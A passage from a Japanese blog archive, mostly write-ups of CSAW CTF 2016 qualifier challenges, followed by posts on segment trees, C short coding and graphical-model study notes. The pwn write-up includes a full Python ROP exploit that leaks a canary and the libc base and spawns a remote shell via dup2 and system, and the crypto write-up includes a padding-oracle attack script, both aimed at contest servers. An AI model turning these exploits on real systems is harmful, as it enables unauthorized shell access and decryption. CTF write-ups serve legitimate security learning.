csaw ctf 2016 quals のwriteup
CSAW 2016 にTSGの面々(dai,moratorium08,satos)で参加してました。
14問解いて1226ptで126位でした。
自分が解いたり関わったりしたやつについてのWriteupっぽいものです。
The Rock
64bitのELF。stripped。
C++で書かれたやつだったので、objdumpをデマングルしてみたりする。c++filtというのでできるらしい。やったらわりと読みやすくなったので便利だった。
import os def dem(s): os.system('echo "' + s + '" | c++filt > do.txt') with open('do.txt','r') as fp: res = fp.readlines()[0].split('\n')[0] #print res return res with open('objd.txt','r') as fp: gs = ''.join(fp.readlines()) ls = len(gs) ts = "" i = 0 while i<ls: if gs[i]!='<': ts += gs[i] i += 1 else: ts += gs[i] i += 1 cs = "" while gs[i]!='>' and gs[i] != '@': cs += gs[i] i += 1 ts += dem(cs) #print ts with open('demd.txt','w') as gp: gp.write(ts)
問題は正しい文字列を入れるとcorrect the flag is flag{入力文字列}を返してくれる系のやつ。
最初、適当なのを入れるとToo short or too long とか返ってくる。
lengthで調べると、
4016d2: e8 29 f7 ff ff call 400e00 <_ZNKSs6lengthEv@plt> 4016d7: 48 83 f8 1e cmp rax,0x1e
というのがあったので、'a' * 30 をぶちこんでやると、passed 0 とか言われるようになる。
うまいことcorrectが出るようなパスを探すと、call 4017e6 の返り値をうまいことしてやればよいと分かる。4017e6は引数として自作謎構造体が与えられており、その中の2つの文字列を比較している模様。いろいろと入力を変えて調べてみると、片方は固定で、もう片方は入力に依存している。で、依存している方は'a' * 30 を入れると '^' * 30が、'a' * 15 + 'b' * 15 を入れると '^' * 15 + '_' * 15 が返ってくるのでどうやら各文字について変換してるっぽい。ここで'\x00' * 30 から '\xff' * 30 までを入力として走らせてみると、ひとつだけpassed 1 が返ってくるので順繰りに1文字ずつあわせていけばよいとわかる。
import os bs = "" while len(bs)<30: mbl = len(bs) for i in range(0,128): ns = bs + chr(i) ns += (30 - len(ns)) * 'a' with open('i.txt','w') as fp: fp.write(ns) os.system("./rock < i.txt > co.txt") ok = False with open('co.txt','r') as fp: rs = fp.readlines()[-1] rs = rs.split()[-1] #print rs if rs.isdigit(): #print rs if int(rs,10)>len(bs): bs += chr(i) ok = True if ok: break print bs if mbl==len(bs): break
deedeedee
64bitのELF。not stripped。
実行してみると、
Your hexencoded, encrypted flag is: 676c60677a74326d716c6074325f6c6575347172316773616c6d686e665f68735e6773385e345e3377657379316e327d I generated it at compile time. :) Can you decrypt it for me?
と言われる。いわゆるコンパイル時実行というやつ(テンプレートとかのあれ)らしい。中を見てみると、どうやらD言語で書かれていたらしく、D言語的デマングルがされてる。実際に出力部を見てみると、変換後の文字列がそのままデータとして格納されてるようで元の文字列は影も形もない。どないするねんとなる。
うろうろしていると、_D9deedeedee7encryptFNaNfAyaZAya という関数が見つかる。中をのぞいてみると、
edi , esi = _D9deedeedee21__T3encVAyaa3_313131Z3encFNaNfAyaZAya(edi,esi) edi , esi = _D9deedeedee21__T3encVAyaa3_323232Z3encFNaNfAyaZAya(edi,esi) ... こんなのがたくさん続く ... edi , esi = _D9deedeedee33__T3encVAyaa9_343939343939343939Z3encFNaNfAyaZAya(edi,esi)
みたいな感じになってる。どうやら名前からするにそれぞれの関数はtemplate的なやつを用いてコンパイル時に作られたみたい、ということはこの関数が実行時にかまされたやつなのでは、と推測が立つ。
各関数を解析してみると、たとえば、_D9deedeedee21__T3encVAyaa3_313131Z3encFNaNfAyaZAyaは、
convx(){ acc = s[0]; res = ""; for(p,q in zip(circle("111"),s)){ res.append(acc ^ (p ^ q)); } return res; }
みたいになってることがわかる。(D言語を書いたことがないので文法は適当)
ここでaccの情報は落ちてしまうが、xor演算はモノイドになるので圧縮できて、最後に256パターンを試してやればよい。あとは関数名を抽出してやって復元してやればよい。
ts = "" with open('objd.txt') as fp: s = fp.readlines() i = 0 while s[i] != ' 44cde0: 55 push rbp\n': print i, i += 1 while s[i] != ' 44e36b: 0f 1f 44 00 00 nop DWORD PTR [rax+rax*1+0x0]\n': ts += s[i] i += 1 with open('ed1.txt','w') as fp: fp.write(ts) fs = [] with open('ed1.txt','r') as fp: ss = ''.join(fp.readlines()) ss = ss.split('\n') for r in ss: #print 'x',r if len(r)>0 and r[-1] == '>': ads = r.split('<')[1][:-2] ads = ads.split('_')[-1] ads = ads.split('Z')[0] ts = "" ls = len(ads) for i in xrange(ls/2): #ts += ads[i*2:i*2+2] + ',' ts += chr(int(ads[i*2:i*2+2],16)) fs.append(ts) #print fs fs = fs[::-1] bs = "gl`gzt2mql`t2_leu4qr1gsalmhnf_hs^gs8^4^3wesy1n2}" bs = map(ord,bs) for cv in fs: ts = [] lv = len(cv) i = 0 for c in bs: ts.append(c ^ ord(cv[i % lv])) i += 1 bs = ts #flag{t3mplat3_met4pr0gramming_is_gr8_4_3very0n3} for i in xrange(256): ns = "" for c in bs: ns += chr(c ^ i) print ns
Sleeping
あんちくしょうシリーズその1。
謎ソースコードが与えられる。
len(key)==12ならbase64.b64encode(open("./sleeping.png",'rb').read()の値が返ってくる、とか書かれている。まずkeyが使われていないのが謎。また、ncして飛んでくる文字列をbase64デコードしてもpngの形式にならずただのdataだといわれる。なにこれ、エスパーでは...とかいいつつ放置していた。
ふと思い立ってPortable Network Graphics - Wikipediaを調べてみるとpngの先頭16byteは固定とのこと。ここでエスパー力が働き、len(key)==12のみ分かってるってことはkeyが繰り返しxorされているのでは!?となってこれをもとにkeyを算出してやるとなんか画像が復元されるので解ける。(この問題が溶けるとしたらこういう解法くらいしかないよなぁ...とか、ファイルの先頭の方のAscii文字度が高いのでなんかXOR的なあれでは...?くらいの推理はしていた)
Gametime
あんちくしょうシリーズその2。
音ゲーっぽいゲーム(Windows,32bit)が与えられるので、そのReversing...のはずだった。
「これパッチを当てるとこがたくさんあって面倒ですね。なんか1337と比較してるとこがあるし無限に時間がかかるのかな...?」「とりあえず遊んでみる?」
1~2分後...
「なんかThe key isとか出てるんだけどこれはなんなんですかね」「とりあえずSubmitしてみる?」 -> Accept
とかいうゲームを遊んでみるだけ問だったのでRev要素が0でした...(なんだったんだ)
Key
若干あんちくしょう。
Windows,32bitのReversing。
1. ふつうに起動すると、?W?h?a?t h?a?p?p?e?n?と言われる。調べてみると、C:\Users\CSAW2016\haha\flag_dir\flag.txtをOpenしようとしている部分が見つかるのでそれを作る。中に適当にflaghogrhogrとか書いておく。
2. 実行してみると、=W=r=o=n=g=K=e=y=と言われるので、見てみると、その直前あたりに判定ルーチン(sub_4020c0)があって、sub_4020c0(flag.txtの文字列,長さ,謎固定文字列(idg_cni~bjbfi|gsxb),長さ) みたいな呼び出され方をしている。
3. sub_4020c0はなんかめんどくさいことをやってるなー、とりあえず挙動でもみてみるかー、と思ってflag.txtの中身をidg_cni~bjbfi|gsxbにして動かすと、なんかYou Did It といわれる。
4. !? と思ってidg_cni~bjbfi|gsxbをsubmitするとCorrectと言われるのでおしまい。sub_4020c0はstrcmpを難読化したやつだったみたい。
途中めんどくさいなあと思って放っておいたのだけれど雑に手をつけたら雑に解けてしまった感じ。
Regexpire
Misc。実質PPC。
javascriptのっぽい正規表現が飛んでくるので、それにmatchする文字列を返してやる。
途中、\dとか\Dとか\wとか\Wを勘違いしていてなかなか苦労した。あとパーザはちょっと雑でざる。下手に書いてしまった気がする。
import struct, socket, sys, telnetlib, os import urllib, time class mystr: def __init__(sl,s): print 'init',s sl.s = s sl.i = len(s)-1 def getc(sl): if sl.i==0 or sl.s[sl.i-1]!='\\': res = sl.s[sl.i] sl.i -= 1 else: if sl.s[sl.i]=='D': res = 'a' elif sl.s[sl.i]=='d': res = '3' elif sl.s[sl.i]=='w': res = 'a' elif sl.s[sl.i]=='W': res = '%' else: res = [sl.i] sl.i -= 2 return res def getw(sl): print 'getw',sl.i,sl.s[sl.i] c = sl.s[sl.i] if c==')': g = "" sl.i -= 1 while sl.s[sl.i]!='|': g = sl.s[sl.i] + g sl.i -= 1 res = mystr(g).getma() while sl.s[sl.i]!='(': sl.i -= 1 sl.i -= 1 elif c=='*': sl.i -= 1 sl.getw() res = "" elif c=='+': sl.i -= 1 res = sl.getw() elif c==']': sl.i -= 1 res = sl.getc() """ while res =='' or res == ' ': res = sl.getc() """ tc = '' while tc!='[': tc = sl.getc() elif c=='}': sl.i -= 1 p = "" while sl.s[sl.i]!='{': p = sl.s[sl.i] + p sl.i -= 1 x = int(p,10) sl.i -= 1 pw = sl.getw() res = pw * x else: res = sl.getc() return res def getma(sl): res = "" while sl.i>=0: res = sl.getw() + res print sl.i,res print res return res ''' q = '[sjN]*[a-zA-Z]0IN+[a-z][a-z]*u{9}\W(trump|clinton){6}[i4yCGL][i-r]*' print mystr(q).getma() exit(-1) ''' sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect(('misc.chal.csaw.io', 8001)) def getunt(c): res = "" while res=='' or res[-len(c):]!=c: res += sock.recv(1) print res return res getunt('?\n') while True: s = getunt('\n') s = s[:-1] if s=='Irregular': break res = mystr(s).getma() sock.send(res + '\n')
Tutorial
前の記事参照。
感想
Reversing面倒くさいなあと思いつついろいろと解いていた感じ。
エスパー問がたくさんあってエスパー力が身についたのでよかった(よくない)。エスパー問は撲滅されるべき。
はじめて生のCTF中にpwn問題を通すことができたのでいい記念になった。
追記
Neo
大会中にとけなかったやつ。Padding Oracle Attackだと予想はついたものの、自分で一度も書いたことがなく、また他のとこから引っ張ってきたコードが動かなかったので解けずじまいだった。
大会終了後もしばらくサービスが動いていたので解いた。
#coding: utf-8 import urllib from HTMLParser import HTMLParser class TestParser(HTMLParser): def __init__(self): HTMLParser.__init__(self) self.findederr = False def handle_starttag(self,tagname,attribute): if tagname.lower() == "div": if attribute[0][1]=='alert alert-error': self.findederr = True def oracle(gs): #print gs url = 'http://crypto.chal.csaw.io:8001/' params = urllib.urlencode({'matrix-id':gs}) #print 'send', #print params f = urllib.urlopen(url, params) s = f.read() #print s #print 'recv', parser = TestParser() parser.feed(s) res = parser.findederr parser.close() return not res import base64 #bs = "pDjx7VaOqCkjk/AniTtGezPvSfBjXzy6oWg7PjGrJxvnAHbQPXwU7Zm87abBv4OIcQN+mFeG7mwIOb+cg+8//Ud0HpJXowsgLHkE/CEIrag=" bs = "nfUgtYJZpGxz7mlMKFaGIuPmDBSiO7DrtuULgAawfNULJyjnYRP4AzZp7Mwi/ZvFDLGKKVvHv0TqhdcklTi0ygwfQM+XRYCo+dFLq8qEkQ4=" bs = base64.b64decode(bs) blocks = [] for i in xrange(len(bs)/16): blocks.append(map(ord,bs[i*16:(i+1)*16])) print blocks plain = "" idx = 0 for nb in blocks[1:]: #b1 = map(ord,bs[80-16:80]) npl = [0] * 16 for n in range(0,16)[::-1]: pn = 16-n for c in xrange(256): #print c, npl[n] = c sv = [npl[i] ^ pn for i in xrange(16)] sv += nb sv = ''.join(map(chr,sv)) sv = base64.b64encode(sv) if oracle(sv): print 'n .. ', n, 'c .. ',c break npl = map(lambda (p,q): p^q,zip(npl,blocks[idx])) npl = ''.join(map(chr,npl)) print npl plain += npl idx += 1 print plain #flag{what_if_i_told_you_you_solved_the_challenge}
csaw ctf 2016 qualsのTutorialのwriteup
Tutorial (pwn 200)
検分
strippedでないx86_64バイナリ。libcももらえる。
NXあり、カナリーあり、PIEなし。
挙動は大雑把に、
void priv(){ /* ルートディレクトリを/home/tutorialにしたり、 tutorialのuid,gidに変更したりする。 */ } func1(int fd){ void* p = dlsym(-1,"puts"); //[rbp-0x48] write(fd,"rifarense"); sprintf(rbp-0x40,"%p\n",p); write(fd,rbp-0x40,len=15); } func2(int fd){ bzero(rbp-0x140,0x12c); write(fd,"timetotext .. " ">"); read(fd,rbp-0x140,len=0x1cc); write(fd,rbp-0x140,len=0x144); } int main(){ priv(); /* あのportをbindしてforkして listenするたぐいのやつ。argv[0]がポート番号になる。 */ for(;;){ /* 入力によって、func1かfunc2が実行できる */ } }
みたいな感じでした。
func2のread(fd,rbp-0x140,len=0x1cc);が明らかにバッファオーバーフロー。いちおうカナリーはあるのだけれど、write(fd,rbp-0x140,len=0x144);があるので、一回目は短い入力でカナリーを得る->二回目に上書き、でよい。(なぜなら、カナリーはプロセスで共通、かつwriteはヌル文字関係なく吐き出してくれる)
さて、上書きできるのだが、スタックが実行不能である。また、rbpの下4byteしかwriteで吐き出されないのでスタックの位置が不明(まあこれでも推測 or 全探索可能なのかもしれないが)。また、x86_64なので関数呼び出し時に引数をレジスタに入れてやらないといけない。よって、ROPを用いたexploitを書くことになる(はじめてのROP!!)。
ここで、有難いことにfunc1でputs-0x500のアドレスが得られるのでlibcのbaseアドレスが得られる。ので、libcの無限にあるropガジェットが使い放題になるのでこれを用いてexploitを書く。
実際にexploitを作る
まず、そもそもtutorialという名前のユーザーがいないとバイナリが動かないので、katagaitai CTF勉強会 #5 pwnables編 - PlaidCTF 2015 Pwnable620 tpを参考にしつつユーザーを作る。あとはsudo権限つけてgdbで実行してやると動いた(ただ、なんかプログラムを終了させてもポートが埋まったままだったりしていた...)。
exploitコードには例のごとくpythonを用いる。カナリーとputs-0x500を得るところまではわりと淡々と書ける。
ROPガジェットを調べるために、rp++をx64でスタックバッファオーバーフローをやってみる - ももいろテクノロジーを参考にしつつ入れる。同ページを参考にしつつ、systemとかputsとかwriteとかの位置を 『 nm -D 』を用いて、"/bin/sh" の位置を 『 strings -tx 』を用いて調べる。また、rp++でpop rdi,pop rsi,pop rdxの位置を調べておく。(今回、手元のlibcと与えられたlibcをごっちゃにして位置を調べてて、位置の差分が合わねえとか言って時間を無限に溶かしてしまったので以降気をつけたい。手元のlibcは ldd tutorial とかで調べられるとのこと。)
材料が集まったらまずはwrite(fd,"/bin/sh",7); が手元とリモートで動くかどうかを確かめた。fdは直前にwriteを呼んでいたのでrdiに入りっぱなしであって推測してやる必要がなかった(多分4あたりだろうけれど)。わりとすんなり動いたはず。
次にsystem("/bin/sh"); を呼び出すコードを書く。ただし標準入出力は手の届かないとこにあるのでdup2を用いてfdにつないでやる。具体的には dup2(fd,0); dup2(fd,1); system("/bin/sh"); としてやればうまくいった。これも一発で動いて気持ちよかった。
ソースコード
#coding: utf-8 from socket import * import time isgaibu = False isgaibu = True p = socket(AF_INET, SOCK_STREAM) if isgaibu: p.connect(("pwn.chal.csaw.io", 8002)) raw_input('gdb$') else: p.connect(("localhost", 8006)) #8006 const. time.sleep(1) raw_input('gdb$') def getunt(c): res = "" while res=='' or res[-len(c):]!=c: #print res[-len(c):], res += p.recv(1) print res return res def addr2s(x): res = "" for i in xrange(8): res += chr(x % 256) x /= 256 return res def s2hex(s): return map(lambda c: hex(ord(c)),s) def s2addr(s): res = 0 for i in xrange(8): res *= 256 res += ord(s[7-i]) return res def shell(): while True: p.send(raw_input() + '\n') print p.recv(1024) def getlibbase(): #print p.recv(1024) getunt('\n>') p.send('1') time.sleep(0.5) s = getunt('-Tuto') res = s.split()[0].split(':')[1][2:] #print res res = int(res,16) return res def getcanary(): getunt('\n>') p.send('2') getunt('\n>') p.send('xx') s = getunt('-Tuto') print 's..',s s = s[:-5] print hex(len(s)) print map(ord,s) return s[-12:-4] canary = getcanary() puts_ptr = getlibbase() + 0x500 ''' 手元 puts 0000000000070a30 system 00000000000443d0 rdi 0x000218a2: pop rdi ; ret ; (521 found) rsi 0x000232f5: pop rsi ; ret ; (158 found) rdx 0x00001b92: pop rdx ; ret ; (5 found) rcx 0x000ea8ea: pop rcx ; pop rbx ; ret ; (1 found) ''' if isgaibu: dup2_diff = 0x0ebe90 puts_diff = 0x000000000006fd60 system_diff = 0x0000000000046590 write_diff = 0xeb700 rdi_diff = 0x00022b9a rsi_diff = 0x00024885 rdx_diff = 0x00001b8e binsh_diff = 0x17c8c3 else: dup2_diff = 0x0f7b90 puts_diff = 0x0000000000070a30 system_diff = 0x00000000000443d0 write_diff = 0xf74d0 rdi_diff = 0x000218a2 rsi_diff = 0x000232f5 rdx_diff = 0x00001b92 binsh_diff = 0x18c3dd libc_base = puts_ptr - puts_diff pop_rdi_ptr = rdi_diff + libc_base pop_rsi_ptr = rsi_diff + libc_base pop_rdx_ptr = rdx_diff + libc_base binsh_ptr = binsh_diff + libc_base write_ptr = write_diff + libc_base dup2_ptr = dup2_diff + libc_base system_ptr = system_diff + libc_base #exit(-1) def sendshec(s): p.send('2') print p.recv(1024) p.send('x' * 0x138 + canary + s) print p.recv(1024) #sendshec('hogehasefg') #dup2(4,1); とかのあとにsystemですかねー? #fd は4あたりかな-. ebp_fake = 0xffffe3b0 sc = "" ''' sc += addr2s(ebp_fake) sc += addr2s(pop_rsi_ptr) #rdiはそのままでよい。 sc += addr2s(binsh_ptr) sc += addr2s(pop_rdx_ptr) sc += addr2s(7) sc += addr2s(write_ptr) ''' sc += addr2s(ebp_fake) sc += addr2s(pop_rsi_ptr) #rdiはそのままでよい。 sc += addr2s(0) sc += addr2s(dup2_ptr) sc += addr2s(pop_rsi_ptr) #rdiはそのままでよい。 sc += addr2s(1) sc += addr2s(dup2_ptr) sc += addr2s(pop_rdi_ptr) sc += addr2s(binsh_ptr) sc += addr2s(system_ptr) sendshec(sc) time.sleep(1) #print p.recv(1024) shell()
第x回プロコン分科会(seg木)
seg木
このへんから高速化とかそういう技術が必要になってきます
logNは定数。(要出典)
一般的なの
RMQ。ある区間内の最大(最小)値、一か所の変更ができる。
int N; int seg[400005]; void init(){ N=1; while(N<=n)N*=2; rep(i,N)seg[i+N]=-inf; rep(i,n)seg[i+N]=初期値[i]; ireg(i,1,N-1)seg[i]=max(seg[i*2],seg[i*2+1]); } int get(int l,int r,int a,int b,int k){ //今、区間[l,r)(ちょうどk番目のノード)を見ていて、 //クエリは[a,b)内のmaxを返してくれ、というやつ。 if(r<=a || b<=l)return -inf; //全くかぶってない if(a<=l && r<=b)return seg[k]; //☆ return max( get(l,(l+r)/2,a,b,k*2), get((l+r)/2,r,a,b,k*2+1)); //わける } int get_max(int a,int b){ //外部からはこのようにgetを呼び出す return get(0,N,a,b,1); } void update(int p,int a){ //位置aを値pにする a+=N; seg[a]=p; a/=2; while(a>0){ seg[a]=max(seg[a*2],seg[a*2+1]); a/=2; } }
注意)
segの長さは、n*4くらい取っておくこと。
(Nがn*2くらいまでなって、segは2*N要素くらいいる)
半開区間です。
で、一回の呼び出しに対して、
updateはlog(N)回くらいwhile文が回る。
get の呼び出し回数が増えるのは、☆のところだが、
☆が呼び出されるのは、[l,r)と[a,b)が交差するとき。
で、それぞれの端点a,bについて、交差している区間はたかだかlog(N)個なので、
全部でだいたい4*log(N)回くらいgetが呼び出される。
ので、クエリに対してO(log(N))で答えられる、やったね、という話。
派生
各ノードに対してvectorとかsegtreeとかを持たせる話もある。
(2次元平面に対してある区域内の点の個数を求める、とか)
starry sky tree
ある区間内のmin、ある区間への加算、みたいなクエリに対して答えろ、という問題がある。
(seg木を二つ持てば解けるが同上)
これを解くのがstarry_sky_treeと呼ばれるやつ。
seg木は二分木なわけだが、「根以外のとこでは片方のノードは0」「根から葉までの値の累積和が各地点の値となる」
を満たすように、うまいことseg木を更新してやる。
たとえば、
[3, 1, 4, 1, 5, 9, 2, 6]
は、
[ 1 ] [ 0 ],[ 1 ] [ 0 ],[ 0 ],[ 3 ],[ 0 ] [2],[0],[3],[0],[0],[4],[0],[4]
みたいなのでもつ。
さて、実装ですが、
getは取ってくるだけですが、updateがちと面倒です。(ポロロッカさせる必要がある)
// validated at http://codeforces.com/problemset/problem/52/C int N; lli seg[800005]; void init(){ N=1; while(N<=n)N*=2; rep(i,n)seg[i+N]=dat[i]; reg(i,n,N-1)seg[i+N]=inf; ireg(i,1,N-1){ seg[i]=min(seg[i*2],seg[i*2+1]); seg[i*2]-=seg[i]; seg[i*2+1]-=seg[i]; } } lli get(int l,int r,int a,int b,int k){ if(r<=a || b<=l)return inf; if(a<=l && r<=b)return seg[k]; return seg[k] + min( //いままでの累積+子の最小値 get(l,(l+r)/2,a,b,k*2), get((l+r)/2,r,a,b,k*2+1)); //[l,r)の区間の部分木をちっちゃなseg木とみなしたときに //ちゃんと最小値が返っているようにする。 } lli get_min(int a,int b){ //外部からはこのようにgetを呼び出す return get(0,N,a,b,1); } void update(int l,int r,int a,int b,int k,lli p){ //区間[a,b)にpを加える if(r<=a || b<=l)return; if(a<=l && r<=b){ seg[k] += p; return; } update(l,(l+r)/2,a,b,k*2,p); update((l+r)/2,r,a,b,k*2+1,p); //この時点で、左右の子より下の部分は全て正常化されている筈。 //で、現状、自分を含む子ノードの部分は、適当なa,b,cを用いて(aが今のノード) //[ a ] //[ b ],[ c ] //となってるはず。で、 //「左ルートの累積がa+b,右ルートの累積がa+c」 // である状態を保ちつつ、 //「どちらかの子ノードの値が0,もう片方は正」 // であるようにするには、これを //[ a + min(b,c) ] //[ b-min(b,c) ],[ c-min(b,c) ] //としてやればよい。 lli por = min(seg[k*2],seg[k*2+1]); seg[k]+=por; seg[k*2]-=por; seg[k*2+1]-=por; } void update_x(int a,int b,lli p){ //外部からはこのようにupdateを呼び出す update(0,N,a,b,1,p); }
seg木ではない
BIT木(Fenwick Tree)
クエリがmaxではなくsumとかのとき、[1,x)と[1,y)から[x,y)が求まるので、持つノードの数が少なくできる。
BIT木に再帰的にBIT木を持たせる、とかいう話もある。
bit演算を用いると遷移が簡単に書けるよ、というもの。
実装は蟻本を見てください。
平方分割
seg木と似たような考え方として、「平方分割」というやつがある。
(僕はseg木の劣化版だと思っていたが、seg木でできない問題も解けたりするのでなかなか)
平衡二分探索木
http://www.slideshare.net/iwiwi/2-12188757
これとか。
seg木にはできないことをやってのける。
勉強になるの
http://kagamiz.hatenablog.com/entry/2012/12/18/220849
とか、
http://www.slideshare.net/iwiwi/ss-3578491
とか、
http://d.hatena.ne.jp/kyuridenamida/20121114/1352835261
とか、
http://d.hatena.ne.jp/DEGwer/20131211/1386757368
とか、
http://hogloid.hatenablog.com/entry/20121227/1356608982
とか、
http://d.hatena.ne.jp/tozangezan/20111111/1320993464
とか。
AOJ 1601 Short PhraseをShort Codingする
AOJ 1601 Short PhraseのShort Coding - cookies.txt .scr
cookiesくんがショートコーディングをしていたのでそれに対抗してみる。
#include<bits/stdc++.h> main(){ for(char s[50],i,j,p,q;p=atoi(gets(s));printf("%d\n",i)){ for(i=0;i<p;s[i++]=strlen(gets(s+i))); for(i=j=0;j<7;) for(p=i++,j=q=1;q>0;) for(q=j++>5?0:j-2&&j-4?8:6;q>1;q-=s[p++]); } }
s[50],j,p,q; main(i){ for(;p=atoi(gets(s));printf("%d\n",i)){ for(i=0;i<p;s[i++]=strlen(gets(s+i))); for(i=j=0;j<7;) for(p=i++,j=q=1;q>0;) for(q=j++>5?0:j-2&&j-4?8:6;q>1;q-=s[p++]); } }
C++よりCのほうが、「#include
q=j++>5?0:j-2&&j-4?8:6
とあるが、これは、
if(j>5){ q=0; j++; } else{ j++; if(j!=2 && j!=4)q=8; else q=6; }
みたいな挙動をしてて、要は、
int x[10]={1,6,8,6,8,8}; q = x[j++];
みたいなことをしてる。
cookiesくんのほうはdefineとgotoでうまいこと制御しているが、
ショートコーディング理論(C/C++編) - Cozy Ozy
によれば、ちゃんとやればdefine文を使わない方が短くなるらしいのでがんばってdefineなしで縮めみた。
ショートコーディングをすると常識がばんばん破壊されるのでよい。
2016/6/29 22:00 修正と追記
クッキー君より、
p=atoi(gets(s)),p;
のとこ、
p=atoi(gets(s));
でよいのでは、と言われたので修正。2byte縮む。(こういうのが盲点に入ってしまうのでたちがわるい)
あと、コードについての解説を追加しました。
2016/7/7 0:00 追記
なんやかんややってて、更に11byte縮んだので追記。 166byte。
http://judge.u-aizu.ac.jp/onlinejudge/review.jsp?rid=1893982#1
s[50],j,p,q; main(i){ for(;j=i=atoi(gets(s));printf("%d\n",i)){ for(;i;)s[j-i--]=strlen(gets(s+j)); for(;j;) for(p=i++,j=q=6;q>0;) for(q=6842496>>--j*4&15;q>1;) q-=s[p++]; } } // 6842496は0x686880 のこと。 // x>>--j*4&15 は (x>>(--j)*4))&15 の意 // (奇跡的に演算子の優先順位がぴったりはまって括弧がひとつも要らなくなった)
あと、for(;i;) とか、 for(;j;) とかのあたり、初期化子や判定文を削りに削っているとこが見どころですかね。(前のと比べてだいぶ短くなった)
2016/7/7 13:00 追記
まだ縮んだ。158byte。
http://judge.u-aizu.ac.jp/onlinejudge/review.jsp?rid=1903254#1
s[50],j,p,q; main(i){ for(;j=i=atoi(gets(s));printf("%d\n",i)){ for(;i;)s[j-i--]=strlen(gets(s+j)); for(;q>0||j&&(p=i++,j=117933);j/=9) for(q=j%9;q>1;) q-=s[p++]; }}
前回からの進歩として、
「9進法を採用した」(16進法だとj/=16とかq=j%16とかになるので2byte伸びる)(117933は9進法で188686)
「for文がひとつ分なくなった」(まあ、||と&&と()が要るようになったので収支1byteの得ですが)
というのがでかいかと。
皆様の挑戦をお待ちしております。
機械学習分科会、第八章の四,グラフィカルモデルによる推論
ある変数xが状態aを取る確率p(x=a)を求める
モデルが一本鎖のとき
#p(xk=a)の値を求める #p(x1,x2, ... ,xN) = phi[1,2](x1,x2) * phi[2,3](x2,x3) ... phi[N-1,N](xN-1,xN) ans = 0 for x1 in xrange(0,K): .... for xk-1 in xrange(0,K): for xk+1 in xrange(0,K): .... for xN in xrange(0,K): ans += phi[1,2](x1,x2) * phi[2,3](x2,x3) ... phi[N-1,N](xN-1,xN)
ですが、なんやかんやすると、
arpha = 0 for x1 in xrange(0,K): .... for xk-1 in xrange(0,K): arpha += phi[1,2](x1,x2) * ... * phi[k-1,k](xk-1,xk=a) beta = 0 for xk+1 in xrange(0,K): .... for xN in xrange(0,K): beta = phi[k,k+1](xk=a,xk+1) * ... * phi[N-1,N](xN-1,xN) ans += arpha * beta
となって、さらにdpして、
for x0 in xrange(0,K): arpha[0][x0] = 1 for i in xrange(1,k+1): for xi in xrange(0,K): arpha[i][xi] = 0 for xi-1 in xrange(0,K): arpha[i][xi] += arpha[i-1][xi-1] * phi[i-1,i](xi-1,xi) for xN+1 in xrange(0,K): beta[N+1][xN+1] = 1 for i in xrange(k,N).reverse: for xi in xrange(0,K): beta[i][xi] = 0 for xi+1 in xrange(0,K): beta[i][xi] += beta[i+1][xi+1] * phi[i,i+1](xi,xi+1) ans = arpha[k][xk=a] * beta[k][xk=a]
となる。
モデルが木のとき
黒頂点(■)と白頂点(○)についてのdpみたいにすればいけます。
確率を求めたいノードを根にしてやって木を吊るします。
で、各白頂点は、子の黒頂点を、各黒頂点は、子の白頂点を持ってるものとします。
このとき、疑似コードはこんな感じ。
def root(x=a): res = 1 for to in rootnode: res *= kuro(no=to,state=a) return res def kuro(no,state): #no番目の黒ノードの親白ノードが状態stateを取るときの、no番目の黒ノードを根とする部分木の確率の総和 res = 0 tos = kuro[no] ls = len(tos) for t1 in xrange(0,K): ... for tls in xrange(0,K): res = kuro_function[no](state,t1,t2, ... tls) * siro(no=tos[1],state=t1) * ... * siro(no=tos[ls],state=tls) def siro(state,no): #no番目の白ノードが状態stateを取るときの、no番目の白ノードを根とする部分木の確率の総和 res = 1 for to in rootnode: res *= kuro(no=to,state=state) return res def leafsiro(state,no): return 1 def leafkuro(state,no): return kuro_function[no]()
で、計算量ですが、メモ化なりなんなりすると、状態はK*Nパターンしか起こらないので、あとは遷移に掛かる時間に寄りますね。
具体的には、たくさん(dこ)子を持つ黒ノードがあった時に、K^dかかってしまうわけです。
で、因子グラフが木構造をもとにしてできていれば、dがたかだか2で抑えられて幸せという寸法。
(逆に、全結合みたいなやつだと、d=NとなってK^Nかかるのでえらいことになる)
最大の確率をとる変数ベクトル(x1,...,xN)とその時の確率p(x1,...,xN)を求める(max-sumというやつ)
これは、dp->経路復元みたいなのをしてやればよい。
モデルが一本鎖のとき
問題は、
『最大の確率 p(x1,...,xN) を求めよ』となり、
『最大の確率 phi[1,2](x1,x2) * ... * phi[N-1,N](xN-1,xN) を求めよ』となり、logは単調増加なので、logとってもよく、
『最大の log(phi[1,2](x1,x2)) + ... + log(phi[N-1,N](xN-1,xN)) を求めよ』となる。
で、各log(phi[a,a+1](b,c)) を、【頂点 a[b] から頂点 a+1[c] 間の辺の重み】みたいにみると、
『頂点1から頂点Nまでの経路のうち、重み最大のものの重みと、それを与える経路を求めよ』
みたいな感じになります。
で、これはもうdpしてからの経路復元で解けますね。
モデルが木のとき
同様のアナロジーをすると、
『木の各頂点に適切な状態を割り振ることにより、木全体の辺の重みを最大化しろ』
となります。
で、これは、
kuro[x][s] .. 頂点xが状態sを取るときのxからの部分木の辺の重み和の最大値
みたいなdpをすれば、解けますね。
機械学習分科会、第六章、カーネル法、前編。
おわび
ガウス過程のところの話が分からなかったのでその手前までです。ベイズファンのみなさんすみません。
以下、6.40のとこのコードです。なんか適当にいじって遊んだってください。
#coding:utf-8 import random import math import numpy as np print "inported" import matplotlib.pyplot as plt print "inported" def getdata(pn,sgm): res = [] for i in xrange(pn): x = random.uniform(0,10) t = math.sin(x) + random.gauss(0,sgm) x += random.gauss(0,sgm) res.append((x,t)) return res def toplts(x): a,b = [],[] for p in x: a.append(p[0]) b.append(p[1]) return (a,b) pi = 3.1415926535897932384626433 def norm(m,x,sgm): return math.exp(-((x-m)**2)/(2*sgm*sgm)) / (math.sqrt(2*pi)*sgm) ''' plt.clf() X = np.linspace(-2, 2, 256, endpoint=True) plt.plot(X, map(lambda x: norm(0,x,0.5),X)) plt.show() ''' def nadaraya_6_40(dat,ix,sgm): def myu(gzi): return norm(0,gzi,sgm) myuz = map(lambda p: (myu(ix-p[0]),p[1]),dat) s = 0.0 res = 0.0 for (v,t) in myuz: res += v * t s += v res /= s return res sgm = 0.3 pn = 50 plt.clf() #ideal X = np.linspace(0, 10, 256, endpoint=True) plt.plot(X, np.sin(X)) #data dat = getdata(pn,sgm) xs,ys = toplts(dat) plt.plot(xs,ys, 'o') #predict pres = map(lambda x: 